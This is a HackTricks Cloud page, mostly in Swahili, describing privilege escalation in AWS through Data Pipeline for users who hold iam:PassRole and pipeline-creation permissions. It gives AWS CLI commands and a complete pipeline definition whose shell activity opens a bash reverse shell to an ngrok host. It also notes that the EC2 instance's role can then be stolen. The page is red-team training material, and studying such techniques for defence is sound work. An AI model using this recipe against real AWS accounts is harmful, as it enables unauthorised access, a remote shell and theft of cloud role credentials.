HackTricks CloudAWS - Datapipeline Privesc
Tip
Jifunze na ufanye mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Saidia HackTricks
- Angalia the subscription plans!
- Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
- Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.
datapipeline
Kwa maelezo zaidi kuhusu datapipeline, angalia:
AWS - DataPipeline, CodePipeline & CodeCommit Enum
iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline
Watumiaji walio na hizi idhini wanaweza kupandisha mamlaka kwa kuunda Data Pipeline ili kutekeleza amri zozote kwa kutumia idhini za role iliyoteuliwa:
aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string
Baada ya kuunda pipeline, mshambuliaji anasasisha ufafanuzi wake ili kuamuru vitendo maalum au uundaji wa rasilimali:
{
"objects": [
{
"id": "CreateDirectory",
"type": "ShellCommandActivity",
"command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn": { "ref": "instance" }
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id": "instance",
"name": "instance",
"type": "Ec2Resource",
"actionOnTaskFailure": "terminate",
"actionOnResourceFailure": "retryAll",
"maximumRetries": "1",
"instanceType": "t2.micro",
"securityGroups": ["default"],
"role": "assumable_datapipeline",
"resourceRole": "assumable_ec2_profile_instance"
}
]
}
Note
Kumbuka kwamba role kwenye mstari 14, 15 na 27 inapaswa kuwa role inayoweza kuchukuliwa na datapipeline.amazonaws.com na role kwenye mstari 28 inapaswa kuwa role inayoweza kuchukuliwa na ec2.amazonaws.com kwa kutumia EC2 profile instance.
Zaidi ya hayo, EC2 instance itapata ufikiaji kwa role inayoweza kuchukuliwa tu na EC2 instance (hivyo unaweza kuiba ile pekee).
aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
--pipeline-definition file:///pipeline/definition.json
The faili ya ufafanuzi wa pipeline, iliyotengenezwa na mshambuliaji, ina maagizo ya kutekeleza amri au kuunda rasilimali kupitia AWS API, ikitumia ruhusa za jukumu la Data Pipeline ili uwezekano wa kupata vibali vya ziada.
Athari Inayoweza Kutokea: Privesc moja kwa moja kwa role ya huduma ya ec2 iliyotajwa.
Marejeo
Tip
Jifunze na ufanye mazoezi ya AWS Hacking:
Jifunze na ufanye mazoezi ya GCP Hacking:
Jifunze na ufanye mazoezi ya Az Hacking:Saidia HackTricks
- Angalia the subscription plans!
- Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
- Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.